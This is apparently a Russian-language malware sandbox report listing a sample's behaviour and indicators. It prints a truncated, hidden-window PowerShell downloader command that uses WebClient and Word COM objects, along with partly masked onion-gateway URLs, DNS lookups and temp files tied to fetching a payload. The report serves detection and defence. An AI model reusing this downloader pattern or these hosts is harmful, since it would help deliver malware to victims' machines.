Техническая информация
- '<SYSTEM32>\cmd.exe' /c start /b powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$word = new-object -ComObject word.application;$random = n...
- %WINDIR%\ServiceProfiles\NetworkService\appdata\local\temp\cab6980.tmp
- %WINDIR%\ServiceProfiles\NetworkService\appdata\local\temp\tar6981.tmp
- %WINDIR%\ServiceProfiles\NetworkService\appdata\local\temp\cab6980.tmp
- %WINDIR%\ServiceProfiles\NetworkService\appdata\local\temp\tar6981.tmp
- http://ur######lmo3krly.onion.nu/15.mov?sh############
- http://62######swhorx34.onion.nu/15.mov?sh############
- http://77######bt5cd6dv.onion.nu/15.mov?sh############
- http://ur######lmo3krly.onion.to/15.mov?sh############
- http://62######swhorx34.onion.to/15.mov?sh############
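- http://oc##.#odaddy.com//MEgwRjBEMEIwQDAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX%2B2yz8LQsgM4CBwQLre%2BWcn4%3D (судя по формату пути, это OCSP-запрос проверки статуса сертификата, а не обращение за вредоносным содержимым)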
- DNS ASK ur######lmo3krly.onion.nu
- DNS ASK 62######swhorx34.onion.nu
- DNS ASK 77######bt5cd6dv.onion.nu
- DNS ASK ur######lmo3krly.onion.to
- DNS ASK 62######swhorx34.onion.to
- DNS ASK oc##.#odaddy.com
- '<SYSTEM32>\cmd.exe' /c start /b powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$word = new-object -ComObject word.application;$random = n... (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\winword.exe' /Automation -Embedding